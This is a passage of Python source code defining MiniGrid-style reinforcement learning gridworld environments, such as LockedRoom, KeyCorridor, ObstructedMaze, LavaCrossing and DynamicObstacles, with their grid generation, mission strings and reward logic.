super().step(action)\n\n ai, aj = self.agent.pos\n ti, tj = self.target_pos\n\n # Don't let the agent open any of the doors\n if self.actions[action] == 'toggle':\n reward = self._lose_reward\n done = True\n\n # Reward performing done action in front of the target door\n if self.actions[action] == 'done':\n reward = self._lose_reward\n if (ai == ti and abs(aj - tj) == 1) or (aj == tj and abs(ai - ti) == 1):\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass PutNear(MiniGridEnv):\n \"\"\"\n The agent is instructed through a textual string to pick up an object and place it next to another object. This environment is easy to solve with two objects, but difficult to solve with more, as it involves both textual understanding and spatial reasoning involving multiple objects.\n \"\"\"\n\n def __init__(\n self,\n size=6,\n num_objs=2,\n max_steps=None,\n **kwargs\n ):\n self.num_objs = num_objs\n\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n # Types and colors of objects we can generate\n types = ['key', 'ball', 'box']\n\n objs = []\n obj_pos = []\n\n def near_obj(env, p1):\n for p2 in obj_pos:\n di = p1[0] - p2[0]\n dj = p1[1] - p2[1]\n if abs(di) <= 1 and abs(dj) <= 1:\n return True\n return False\n\n # Until we have generated all the objects\n while len(objs) < self.num_objs:\n obj_type = self.rng.choice(types)\n obj_color = self.rng.choice(COLORS)\n\n # If this object already exists, try again\n if (obj_type, obj_color) in objs:\n continue\n\n if obj_type == 'key':\n obj = Key(obj_color)\n elif obj_type == 'ball':\n obj = Ball(obj_color)\n elif obj_type == 'box':\n obj = Box(obj_color)\n\n self.place_obj(obj, reject_fn=near_obj)\n\n objs.append((obj_type, obj_color))\n obj_pos.append(obj.pos)\n\n # Randomize the agent start position and orientation\n self.place_agent()\n\n # Choose a random object to be moved\n obj_idx = self.rng.randint(0, len(objs))\n self.move_type, self.move_color = objs[obj_idx]\n # self.move_pos = obj_pos[obj_idx]\n\n # Choose a target object (to put the first object next to)\n while True:\n targetIdx = self.rng.randint(0, len(objs))\n if targetIdx != obj_idx:\n break\n self.target_type, self.target_color = objs[targetIdx]\n self.target_pos = obj_pos[targetIdx]\n\n self.mission = (f'put the {self.move_color} {self.move_type} near '\n f'the {self.target_color} {self.target_type}')\n\n def step(self, action):\n pre_carrying = self.agent.carrying\n\n obs, reward, done, info = super().step(action)\n\n oi, oj = self.agent.front_pos\n ti, tj = self.target_pos\n\n # If we picked up the wrong object, terminate the episode\n if self.actions[action] == 'pickup' and self.agent.is_carrying:\n if self.agent.carrying.type != self.move_type or self.agent.carrying.color != self.move_color:\n reward = self._lose_reward\n done = True\n\n # If successfully dropping an object near the target\n if self.actions[action] == 'drop' and pre_carrying:\n reward = self._lose_reward\n if self[oj, oi] is pre_carrying:\n if abs(oi - ti) <= 1 and abs(oj - tj) <= 1:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass RedBlueDoor(MiniGridEnv):\n \"\"\"\n The purpose of this environment is to test memory. The agent is randomly placed within a room with one red and one blue door facing opposite directions. The agent has to open the red door and then open the blue door, in that order. The agent, when facing one door, cannot see the door behind him. Hence, the agent needs to remember whether or not he has previously opened the other door in order to reliably succeed at completing the task.\n \"\"\"\n\n def __init__(self, size=8, max_steps=None, **kwargs):\n self.size = size\n\n super().__init__(\n height=size,\n width=2 * size,\n max_steps=20 * size * size if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the grid walls\n self.wall_rect(0, 0, self.size, 2 * self.size)\n self.wall_rect(0, self.size // 2, self.size, self.size)\n\n # Place the agent in the top-left corner\n self.place_agent(top=(0, self.size // 2), size=(self.size, self.size))\n\n # Add a red door at a random position in the left wall\n pos = self.rng.randint(1, self.size - 1)\n self.red_door = Door('red')\n self[pos, self.size // 2] = self.red_door\n\n # Add a blue door at a random position in the right wall\n pos = self.rng.randint(1, self.size - 1)\n self.blue_door = Door('blue')\n self[pos, self.size // 2 + self.size - 1] = self.blue_door\n\n # Generate the mission string\n self.mission = 'open the red door then the blue door'\n\n def step(self, action):\n red_door_opened_before = self.red_door.is_open\n blue_door_opened_before = self.blue_door.is_open\n\n obs, reward, done, info = super().step(action)\n\n red_door_opened_after = self.red_door.is_open\n blue_door_opened_after = self.blue_door.is_open\n\n if blue_door_opened_after:\n if red_door_opened_before:\n reward = self._win_reward\n done = True\n else:\n reward = self._lose_reward\n done = True\n\n elif red_door_opened_after:\n if blue_door_opened_before:\n reward = self._lose_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass Memory(MiniGridEnv):\n \"\"\"\n This environment is a memory test. The agent starts in a small room\n where it sees an object. It then has to go through a narrow hallway\n which ends in a split. At each end of the split there is an object,\n one of which is the same as the object in the starting room. The\n agent has to remember the initial object, and go to the matching\n object at split.\n \"\"\"\n\n def __init__(\n self,\n size=13,\n random_length=False,\n max_steps=None,\n **kwargs\n ):\n self.random_length = random_length\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n assert height % 2 == 1\n upper_room_wall = height // 2 - 2\n lower_room_wall = height // 2 + 2\n if self.random_length:\n hallway_end = self.rng.randint(4, width - 2)\n else:\n hallway_end = width - 3\n\n # Start room\n self.horz_wall(upper_room_wall, 1, width=4)\n self.horz_wall(upper_room_wall + 1, 4, width=1)\n self.horz_wall(lower_room_wall, 1, width=4)\n self.horz_wall(lower_room_wall - 1, 4, width=1)\n\n # Horizontal hallway\n self.horz_wall(upper_room_wall + 1, 5, width=hallway_end - 5)\n self.horz_wall(lower_room_wall - 1, 5, width=hallway_end - 5)\n\n # Vertical hallway\n self.vert_wall(0, hallway_end, height=height)\n self.vert_wall(0, hallway_end + 2, height=height)\n self[height // 2, hallway_end].clear()\n\n # Fix the player's start position and orientation\n self.agent.pos = (height // 2,\n self.rng.randint(1, hallway_end + 1))\n self.agent.state = 'right'\n\n # Place objects\n start_room_obj = self.rng.choice([Key, Ball])\n self[height // 2 - 1, 1] = start_room_obj('green')\n\n other_objs = self.rng.permutation([Ball, Key])\n pos0 = (height // 2 - 2, hallway_end + 1)\n pos1 = (height // 2 + 2, hallway_end + 1)\n self[pos0] = other_objs[0]('green')\n self[pos1] = other_objs[1]('green')\n\n # Choose the target objects\n if start_room_obj == other_objs[0]:\n self.success_pos = (pos0[0], pos0[1] + 1)\n self.failure_pos = (pos1[0], pos1[1] - 1)\n else:\n self.success_pos = (pos1[0], pos1[1] - 1)\n self.failure_pos = (pos0[0], pos0[1] + 1)\n\n self.mission = 'go to the matching object at the end of the hallway'\n\n def step(self, action):\n if self.actions[action] == 'pickup':\n action = self.actions.index('toggle')\n obs, reward, done, info = super().step(action)\n\n if tuple(self.agent.pos) == self.success_pos:\n reward = self._win_reward\n done = True\n if tuple(self.agent.pos) == self.failure_pos:\n reward = self._lose_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass _LockedRoom(object):\n\n def __init__(self,\n top,\n size,\n door_pos\n ):\n self.top = top\n self.size = size\n self.door_pos = door_pos\n self.color = None\n self.locked = False\n\n def rand_pos(self, env):\n top_i, top_j = self.top\n size_i, size_j = self.size\n return (env.rng.randint(top_i + 1, top_i + size_i - 1),\n env.rng.randint(top_j + 1, top_j + size_j - 1))\n\n\nclass LockedRoom(MiniGridEnv):\n \"\"\"\n The environment has six rooms, one of which is locked. The agent receives a textual mission string as input, telling it which room to go to in order to get the key that opens the locked room. It then has to go into the locked room in order to reach the final goal. This environment is extremely difficult to solve with vanilla reinforcement learning alone.\n \"\"\"\n\n def __init__(self, size=19, max_steps=None, **kwargs):\n super().__init__(\n height=size, \n width=size, \n max_steps=10 * size if max_steps is None else max_steps, \n **kwargs)\n\n def _gen_grid(self, height, width):\n # Create the grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n # Hallway walls\n\n left_wall = width // 2 - 2\n right_wall = width // 2 + 2\n\n self.vert_wall(0, left_wall, height=height)\n self.vert_wall(0, right_wall, height=height)\n\n self.rooms = []\n\n # Room splitting walls\n for n in range(0, 3):\n i = n * (height // 3)\n self.horz_wall(i, 0, width=left_wall)\n self.horz_wall(i, right_wall, width=width - right_wall)\n\n room_height = height // 3 + 1\n room_width = left_wall + 1\n self.rooms.append(_LockedRoom(\n (i, 0),\n (room_height, room_width),\n (i + 3, left_wall)\n ))\n self.rooms.append(_LockedRoom(\n (i, right_wall),\n (room_height, room_width),\n (i + 3, right_wall)\n ))\n\n # Choose one random room to be locked\n locked_room = self.rng.choice(self.rooms)\n locked_room.locked = True\n goal_i = self.rng.randint(locked_room.top[0] + 1, locked_room.top[0] + locked_room.size[0] - 1)\n goal_j = self.rng.randint(locked_room.top[1] + 1, locked_room.top[1] + locked_room.size[1] - 1)\n self[goal_i, goal_j] = Goal()\n\n # Assign the door colors\n colors = self.rng.choice(COLORS, size=len(self.rooms))\n for room, color in zip(self.rooms, colors):\n room.color = color\n if room.locked:\n self[room.door_pos] = Door(color, state='locked')\n else:\n self[room.door_pos] = Door(color)\n\n # Select a random room to contain the key\n while True:\n key_room = self.rng.choice(self.rooms)\n if key_room != locked_room:\n break\n key_pos = key_room.rand_pos(self)\n self[key_pos] = Key(locked_room.color)\n\n # Randomize the player start position and orientation\n self.place_agent(\n top=(0, left_wall),\n size=(height, right_wall - left_wall)\n )\n\n # Generate the mission string\n self.mission = (\n f'get the {locked_room.color} key from the {key_room.color} room, '\n f'unlock the {locked_room.color} door and go to the goal'\n )\n\n\nclass KeyCorridor(RoomGrid):\n \"\"\"\n A ball is behind a locked door, the key is placed in a\n random room.\n\n This environment is similar to the locked room environment, but there are multiple registered environment configurations of increasing size, making it easier to use curriculum learning to train an agent to solve it. The agent has to pick up an object which is behind a locked door. The key is hidden in another room, and the agent has to explore the environment to find it. The mission string does not give the agent any clues as to where the key is placed.\n \"\"\"\n _requires_language = False\n\n def __init__(\n self,\n num_rows=3,\n obj_type='ball',\n room_size=6,\n max_steps=None,\n **kwargs\n ):\n self.obj_type = obj_type\n\n super().__init__(\n room_size=room_size,\n num_rows=num_rows,\n max_steps=30 * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Connect the middle column rooms into a hallway\n for i in range(1, self.num_rows):\n self.remove_wall(i, 1, 'up')\n\n # Add a locked door on the top left\n # Add an object behind the locked door\n room_idx = self.rng.randint(self.num_rows)\n door = self.add_door(room_idx, 2, door_idx='left', locked=True)\n self.obj = self.add_object(room_idx, 2, kind=self.obj_type)\n\n # Add a key in a random room on the left side\n self.add_object(self.rng.randint(self.num_rows), 0, 'key', door.color)\n\n # Place the agent in the middle\n self.place_agent(i=self.num_rows // 2, j=1)\n\n # Make sure all rooms are accessible\n self.connect_all()\n\n self.mission = f'pick up the {self.obj.color} {self.obj.type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'pickup':\n if self.agent.is_carrying:\n if self.agent.carrying is self.obj:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass Unlock(RoomGrid):\n \"\"\"\n The agent has to open a locked door.\n \"\"\"\n _requires_language = False\n\n def __init__(self, max_steps=None, **kwargs):\n room_size = 6\n super().__init__(\n num_rows=1,\n num_cols=2,\n room_size=room_size,\n max_steps=8 * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Make sure the two rooms are directly connected by a locked door\n self.door = self.add_door(0, 0, door_idx='right', locked=True)\n # Add a key to unlock the door\n self.add_object(0, 0, 'key', self.door.color)\n\n self.place_agent(i=0, j=0)\n\n self.mission = 'open the door'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'toggle':\n if self.door.is_open:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass UnlockPickup(RoomGrid):\n \"\"\"\n The agent has to pick up a box which is placed in another room, behind a locked door.\n \"\"\"\n _requires_language = False\n\n def __init__(self, max_steps=None, **kwargs):\n room_size = 6\n super().__init__(\n num_rows=1,\n num_cols=2,\n room_size=room_size,\n max_steps=8 * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Add a box to the room on the right\n self.obj = self.add_object(0, 1, kind='box')\n # Make sure the two rooms are directly connected by a locked door\n door = self.add_door(0, 0, door_idx='right', locked=True)\n # Add a key to unlock the door\n self.add_object(0, 0, 'key', door.color)\n\n self.place_agent(i=0, j=0)\n\n self.mission = f'pick up the {self.obj.color} {self.obj.type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'pickup':\n if self.agent.is_carrying:\n if self.agent.carrying is self.obj:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass BlockedUnlockPickup(RoomGrid):\n \"\"\"\n The agent has to pick up a box which is placed in another room, behind a locked door. The door is also blocked by a ball which the agent has to move before it can unlock the door. Hence, the agent has to learn to move the ball, pick up the key, open the door and pick up the object in the other room.\n \"\"\"\n _requires_language = False\n\n def __init__(self, max_steps=None, **kwargs):\n room_size = 6\n super().__init__(\n num_rows=1,\n num_cols=2,\n room_size=room_size,\n max_steps=16 * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Add a box to the room on the right\n self.obj = self.add_object(0, 1, kind='box')\n # Make sure the two rooms are directly connected by a locked door\n door = self.add_door(0, 0, door_idx='right', locked=True)\n # Block the door with a ball\n color = self.rng.choice(COLORS)\n self[door.pos[0], door.pos[1] - 1] = Ball(color)\n # Add a key to unlock the door\n self.add_object(0, 0, 'key', door.color)\n self.place_agent(i=0, j=0)\n\n self.mission = f'pick up the {self.obj.color} {self.obj.type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'pickup':\n if self.agent.is_carrying:\n if self.agent.carrying is self.obj:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass _ObstructedMaze(RoomGrid):\n \"\"\"\n The agent has to pick up a box which is placed in a corner of a 3x3 maze. The doors are locked, the keys are hidden in boxes and doors are obstructed by balls.\n \"\"\"\n _requires_language = False\n\n def __init__(self,\n num_rows,\n num_cols,\n num_rooms_visited,\n max_steps=None,\n **kwargs\n ):\n room_size = 6\n\n super().__init__(\n room_size=room_size,\n num_rows=num_rows,\n num_cols=num_cols,\n max_steps=4 * num_rooms_visited * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Define the color of the ball to pick up\n self.ball_to_find_color = COLORS[0]\n # Define the color of the balls that obstruct doors\n self.blocking_ball_color = COLORS[1]\n # Define the color of boxes in which keys are hidden\n self.box_color = COLORS[2]\n\n self.mission = f'pick up the {self.ball_to_find_color} ball'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'pickup':\n if self.agent.is_carrying:\n if self.agent.carrying is self.obj:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n def add_door(self, i, j, door_idx='right', color=None, locked=False, key_in_box=False, blocked=False):\n \"\"\"\n Add a door. If the door must be locked, it also adds the key.\n If the key must be hidden, it is put in a box. If the door must\n be obstructed, it adds a ball in front of the door.\n \"\"\"\n\n door = super().add_door(i, j, door_idx=door_idx, color=color, locked=locked)\n\n if blocked: # place a ball in front of the door\n if door_idx == 'right':\n offset = (0, -1)\n elif door_idx == 'down':\n offset = (-1, 0)\n elif door_idx == 'left':\n offset = (0, 1)\n elif door_idx == 'up':\n offset = (1, 0)\n pos = (door.pos[0] + offset[0], door.pos[1] + offset[1])\n self[pos] = Ball(self.blocking_ball_color)\n\n if locked:\n obj = Key(door.color)\n if key_in_box:\n box = Box(self.box_color) if key_in_box else None\n box.contains = obj\n obj = box\n self.place_in_room(i, j, obj)\n\n return door\n\n\nclass ObstructedMaze_1Dlhb(_ObstructedMaze):\n \"\"\"\n A blue ball is hidden in a 2x1 maze. A locked door separates\n rooms. Doors are obstructed by a ball and keys are hidden in boxes.\n \"\"\"\n _requires_language = False\n\n def __init__(self, key_in_box=True, blocked=True, max_steps=None, **kwargs):\n self.key_in_box = key_in_box\n self.blocked = blocked\n\n super().__init__(\n num_rows=1,\n num_cols=2,\n num_rooms_visited=2,\n max_steps=max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n self.add_door(0, 0, door_idx='right',\n color=self.rng.choice(COLORS),\n locked=True,\n key_in_box=self.key_in_box,\n blocked=self.blocked)\n\n self.obj = self.add_object(0, 1, 'ball', color=self.ball_to_find_color)\n self.place_agent(i=0, j=0)\n\n\nclass ObstructedMaze_Full(_ObstructedMaze):\n \"\"\"\n A blue ball is hidden in one of the 4 corners of a 3x3 maze. Doors\n are locked, doors are obstructed by a ball and keys are hidden in\n boxes.\n \"\"\"\n _requires_language = False\n\n def __init__(self, agent_room=(1, 1), key_in_box=True, blocked=True,\n num_quarters=4, num_rooms_visited=25, max_steps=None, **kwargs):\n self.agent_room = agent_room\n self.key_in_box = key_in_box\n self.blocked = blocked\n self.num_quarters = num_quarters\n\n super().__init__(\n num_rows=3,\n num_cols=3,\n num_rooms_visited=num_rooms_visited,\n max_steps=max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n middle_room = (1, 1)\n # Define positions of \"side rooms\" i.e. rooms that are neither\n # corners nor the center.\n side_rooms = {\n 'right': (1, 2),\n 'down': (2, 1),\n 'left': (1, 0),\n 'up': (0, 1)\n }\n # Define all possible colors for doors\n door_colors = self.rng.choice(COLORS, size=len(side_rooms), replace=False)\n door_colors = {\n 'right': door_colors[0],\n 'down': door_colors[1],\n 'left': door_colors[2],\n 'up': door_colors[3]\n }\n\n side_rooms = list(side_rooms.items())[:self.num_quarters]\n for door_idx, side_room in side_rooms:\n # Add a door between the center room and the side room\n door_color = door_colors[door_idx]\n self.add_door(*middle_room, door_idx=door_idx, color=door_color, locked=False)\n\n for k in [-1, 1]:\n # Add a door to each side of the side room\n side_door_idx = self._door_idx(door_idx, k)\n side_door_color = door_colors[side_door_idx]\n self.add_door(*side_room, locked=True,\n door_idx=side_door_idx,\n color=side_door_color,\n key_in_box=self.key_in_box,\n blocked=self.blocked)\n\n corners = [(0, 2), (2, 2), (2, 0), (0, 0)]\n ball_room = corners[self.rng.randint(self.num_quarters)]\n\n self.obj = self.add_object(*ball_room, 'ball', color=self.ball_to_find_color)\n self.place_agent(i=self.agent_room[0], j=self.agent_room[1])\n\n\nclass DistShift(MiniGridEnv):\n \"\"\"\n Distributional shift environment\n\n This environment is based on one of the DeepMind [AI safety gridworlds](https://github.com/deepmind/ai-safety-gridworlds). The agent starts in the top-left corner and must reach the goal which is in the top-right corner, but has to avoid stepping into lava on its way. The aim of this environment is to test an agent's ability to generalize. There are two slightly different variants of the environment, so that the agent can be trained on one variant and tested on the other.\n \"\"\"\n\n def __init__(\n self,\n width=9,\n height=7,\n agent_start_pos=(1,1),\n agent_start_state='right',\n strip2_row=2,\n max_steps=None,\n **kwargs\n ):\n self.agent_start_pos = agent_start_pos\n self.agent_start_state = agent_start_state\n self.goal_pos = (1, width - 2)\n self.strip2_row = strip2_row\n\n super().__init__(\n width=width,\n height=height,\n max_steps=4 * width * height if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place a goal square in the bottom-right corner\n self[self.goal_pos] = Goal()\n\n # Place the lava rows\n for j in range(self.width - 6):\n self[1, 3 + j] = Lava()\n self[self.strip2_row, 3 + j] = Lava()\n\n # Place the agent\n if self.agent_start_pos is not None:\n self.agent.pos = self.agent_start_pos\n self.agent.state = self.agent_start_state\n else:\n self.place_agent()\n\n self.mission = 'get to the green goal square'\n\n\nclass LavaGap(MiniGridEnv):\n \"\"\"\n The agent has to reach the green goal square at the opposite corner of the room, and must pass through a narrow gap in a vertical strip of deadly lava. Touching the lava terminate the episode with a zero reward. This environment is useful for studying safety and safe exploration.\n \"\"\"\n\n def __init__(self, size=7, obstacle_type=Lava, max_steps=None, **kwargs):\n self.obstacle_type = obstacle_type\n super().__init__(\n height=size,\n width=size,\n max_steps=4 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n assert width >= 5 and height >= 5\n\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place the agent in the top-left corner\n self.agent.pos = (1, 1)\n self.agent.state = 'right'\n\n # Place a goal square in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Generate and store random gap position\n gap_pos = (self.rng.randint(1, height - 1),\n self.rng.randint(2, width - 2))\n\n # Place the obstacle wall\n self.vert_wall(1, gap_pos[1], height=height - 2,\n obj=self.obstacle_type)\n\n # Put a hole in the wall\n self[gap_pos].clear()\n\n if type(self.obstacle_type) is Lava:\n self.mission = 'avoid the lava and get to the green goal square'\n else:\n self.mission = 'find the opening and get to the green goal square'\n\n\nclass _Crossing(MiniGridEnv):\n \"\"\"\n Environment with wall or lava obstacles, sparse reward.\n \"\"\"\n\n def __init__(self, size=9, num_crossings=1, obstacle_type=Lava, max_steps=None, **kwargs):\n self.num_crossings = num_crossings\n self.obstacle_type = obstacle_type\n super().__init__(\n height=size,\n width=size,\n max_steps=4 * size * size if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n assert width % 2 == 1 and height % 2 == 1 # odd size\n\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place the agent in the top-left corner\n self.agent.pos = (1, 1)\n self.agent.state = 'right'\n\n # Place a goal square in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Place obstacles (lava or walls)\n\n # Lava rivers or walls specified by direction and position in grid\n rivers = [('v', i) for i in range(2, width - 2, 2)]\n rivers += [('h', j) for j in range(2, height - 2, 2)]\n self.rng.shuffle(rivers)\n rivers = rivers[:self.num_crossings] # sample random rivers\n rivers_v = sorted([pos for d, pos in rivers if d == 'v'])\n rivers_h = sorted([pos for d, pos in rivers if d == 'h'])\n obstacle_pos = itertools.chain(\n itertools.product(range(1, height - 1), rivers_v),\n itertools.product(rivers_h, range(1, width - 1)),\n )\n for pos in obstacle_pos:\n self[pos] = self.obstacle_type()\n\n # Sample path to goal\n path = ['v'] * len(rivers_v) + ['h'] * len(rivers_h)\n self.rng.shuffle(path)\n\n # Create openings\n limits_h = [0] + rivers_h + [height - 1]\n limits_v = [0] + rivers_v + [width - 1]\n room_i, room_j = 0, 0\n for direction in path:\n if direction == 'h':\n i = limits_h[room_i + 1]\n j = self.rng.choice(\n range(limits_v[room_j] + 1, limits_v[room_j + 1]))\n room_i += 1\n elif direction == 'v':\n i = self.rng.choice(\n range(limits_h[room_i] + 1, limits_h[room_i + 1]))\n j = limits_v[room_j + 1]\n room_j += 1\n self[i, j].clear()\n\n if type(self.obstacle_type) is Lava:\n self.mission = 'avoid the lava and get to the green goal square'\n else:\n self.mission = 'find the opening and get to the green goal square'\n\n\nclass LavaCrossing(_Crossing):\n \"\"\"\n The agent has to reach the green goal square on the other corner of the room while avoiding rivers of deadly lava which terminate the episode in failure. Each lava stream runs across the room either horizontally or vertically, and has a single crossing point which can be safely used; Luckily, a path to the goal is guaranteed to exist. This environment is useful for studying safety and safe exploration.\n \"\"\"\n\n def __init__(self, size=9, num_crossings=1, max_steps=None, **kwargs):\n super().__init__(size=size, num_crossings=num_crossings, obstacle_type=Lava, max_steps=max_steps, **kwargs)\n\n\nclass SimpleCrossing(_Crossing):\n \"\"\"\n Similar to the LavaCrossing environment, the agent has to reach the green goal square on the other corner of the room, however lava is replaced by walls. This MDP is therefore much easier and and maybe useful for quickly testing your algorithms.\n \"\"\"\n\n def __init__(self, size=11, num_crossings=5, max_steps=None, **kwargs):\n super().__init__(size=size, num_crossings=num_crossings,\n obstacle_type=Wall, max_steps=max_steps, **kwargs)\n\n\nclass DynamicObstacles(MiniGridEnv):\n \"\"\"\n This environment is an empty room with moving obstacles. The goal of the agent is to reach the green goal square without colliding with any obstacle. A large penalty is subtracted if the agent collides with an obstacle and the episode finishes. This environment is useful to test Dynamic Obstacle Avoidance for mobile robots with Reinforcement Learning in Partial Observability.\n \"\"\"\n\n def __init__(\n self,\n size=8,\n agent_start_pos=(1, 1),\n agent_start_state='right',\n n_obstacles=4,\n max_steps=None,\n **kwargs\n ):\n self.agent_start_pos = agent_start_pos\n self.agent_start_state = agent_start_state\n\n # Reduce obstacles if there are too many\n if n_obstacles <= size / 2 + 1:\n self.n_obstacles = int(n_obstacles)\n else:\n self.n_obstacles = int(size / 2)\n super().__init__(\n height=size,\n width=size,\n max_steps=4 * size * size if max_steps is None else max_steps,\n **kwargs\n )\n # Allow only 3 actions permitted: left, right, forward\n self.action_space = gym.spaces.Discrete(3)\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place a goal square in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Place the agent\n if self.agent_start_pos is not None:\n self.agent.pos = self.agent_start_pos\n self.agent.state = self.agent_start_state\n else:\n self.place_agent()\n\n # Place obstacles\n self.obstacles = []\n for i_obst in range(self.n_obstacles):\n self.obstacles.append(Ball())\n self.place_obj(self.obstacles[i_obst], max_tries=100)\n\n self.mission = 'get to the green goal square'\n\n def step(self, action):\n # Invalid action\n if action >= self.action_space.n:\n action = 0\n\n # Check if there is an obstacle in front of the agent\n front_cell = self[self.agent.front_pos]\n not_clear = front_cell.entity is not None and front_cell.entity.type != 'goal'\n\n # Update obstacle positions\n for i_obst in range(len(self.obstacles)):\n old_pos = self.obstacles[i_obst].pos\n top = tuple(map(operator.add, old_pos, (-1, -1)))\n\n try:\n self.place_obj(self.obstacles[i_obst], top=top, size=(3,3), max_tries=100)\n self[old_pos].clear()\n except RecursionError:\n pass\n\n obs, reward, done, info = super().step(action)\n\n # If the agent tries to walk over an obstacle\n if self.actions[action] == 'forward' and not_clear:\n reward = self._lose_reward\n done = True\n return obs, reward, done, info\n\n return obs, reward, done, info\n\n\nclass Playground(MiniGridEnv):\n \"\"\"\n Environment with multiple rooms and random objects.\n This environment has no specific goals or rewards.\n \"\"\"\n\n def __init__(self, size=19, max_steps=100, **kwargs):\n super().__init__(height=size, width=size, max_steps=max_steps, **kwargs)\n\n def _gen_grid(self, height, width):\n # Create the grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n room_width = width // 3\n room_height = height // 3\n\n # For each row of rooms\n for i in range(3):\n # For each column\n for j in range(3):\n\n i_top = i * room_height\n j_left = j * room_width\n i_bottom = i_top + room_height\n j_right = j_left + room_width\n\n # Right wall and door\n if j + 1 < 3:\n self.vert_wall(i_top, j_right, height=room_height)\n pos = (self.rng.randint(i_top + 1, i_bottom - 1), j_right)\n color = self.rng.choice(COLORS)\n self[pos] = Door(color)\n\n # Bottom wall and door\n if i + 1 < 3:\n self.horz_wall(i_bottom, j_left, width=room_width)\n pos = (i_bottom, self.rng.randint(j_left + 1, j_right - 1))\n color = self.rng.choice(COLORS)\n self[pos] = Door(color)\n\n # Place random objects in the world\n types = ['key', 'ball', 'box']\n for i in range(0, 12):\n obj_type = self.rng.choice(types)\n obj_color = self.rng.choice(COLORS)\n if obj_type == 'key':\n obj = Key(obj_color)\n elif obj_type == 'ball':\n obj = Ball(obj_color)\n elif obj_type == 'box':\n obj = Box(obj_color)\n self.place_obj(obj)\n\n # Randomize the player start position and orientation\n self.place_agent()\n\n # No explicit mission in this environment\n self.mission = ''\n\n\nclass RandomObjects(MiniGridEnv):\n \"\"\"\n This environment is a blank grid filled with randomly placed objects (including wall elements). Useful for curriculum learning as the first learning stage.\n \"\"\"\n\n def __init__(self,\n size=16,\n density=.2,\n objects=OBJECTS,\n colors=COLORS,\n max_steps=100,\n surround_walls=True,\n **kwargs):\n self.density = density\n self.objects = objects\n self.colors = colors\n self.surround_walls = surround_walls\n super().__init__(height=size, width=size, max_steps=max_steps, **kwargs)\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n if self.surround_walls:\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n # Place a goal square at a random location\n self.place_obj(Goal())\n\n # Place random objects in the world\n if self.surround_walls:\n mean_n_objs = int((height - 2) * (width - 2) * self.density)\n else:\n mean_n_objs = int(height * width * self.density)\n n_objs = mean_n_objs\n for i in range(n_objs):\n obj = self.make_obj()\n self.place_obj(obj)\n\n # Randomize the player start position and orientation\n agent_pos = (height // 2, width // 2)\n 